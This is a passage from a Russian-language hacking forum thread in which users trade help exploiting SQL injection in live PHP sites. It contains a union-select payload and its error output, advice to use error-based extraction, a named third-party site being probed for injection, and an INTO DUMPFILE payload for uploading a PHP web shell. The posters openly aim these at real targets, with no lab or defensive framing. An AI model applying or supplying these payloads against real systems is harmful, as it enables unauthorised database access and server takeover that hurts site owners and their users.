ANTICHAT — форум по информационной безопасности, OSINT и технологиям

пробел перед началом текста XML убери

помогите плз

есть уязвимый пхп скрипт(sql inj)

3 столбца

id=x

структура запросса:

SELECT emb_name,emb_class,name FROM rp,gallery WHERE emb_id=x and emb_gallery=gallery_id

соответственно на эту часть запроса я повлиять не могу:

and emb_gallery=gallery_id

При запросе:

id=9999+union+select+1,2,3--

ошибка:

SELECT emb_content_name FROM rp_content WHERE emb_content_article=9999 union select 1,2,3-- AND emb_content_version=1 ORDER BY emb_content_secno -failed

КАК ПРАВИЛЬНО СОСТАВИТЬ ЗАПРОС?

запросы не одинаковые.

отсечь правую часть не получается? все варианты попробовал (//, /**/, +--) ?

to blesse

У Вас уязвимый параметр используется в двух запросах! Используйте Error-based методы вывода!

не знаком с этим можно мануальчик ?

миллионы страниц на эту тему

http://2druga.com/news.php?page=0

Есть ли тут скуля? При подстановки кавычки выбивает ошибку.

Дико извеняюсь не заметил вывод в название страницы (на вкладке еденичка очень сливалась с названием)

теперь след вопрос :

9999+union+select+'текст шелла',null,null+into+DUMPFILE+'/путь/до/вашего/будующего/шелла/shell.php'/*

так я зальюсь?если file_priv=Y

Да скуль есть,но имхо этот сайт не стоит того чтобы ее раскручивать.